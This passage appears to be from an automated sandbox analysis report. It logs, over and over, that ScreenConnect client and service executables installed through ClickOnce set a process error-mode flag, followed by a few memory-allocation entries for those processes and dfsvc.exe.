                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 20C250B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 20C3EAE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeMemory allocated: 1210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeMemory allocated: 1AFB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 1170000 memory reserve | memory write watch
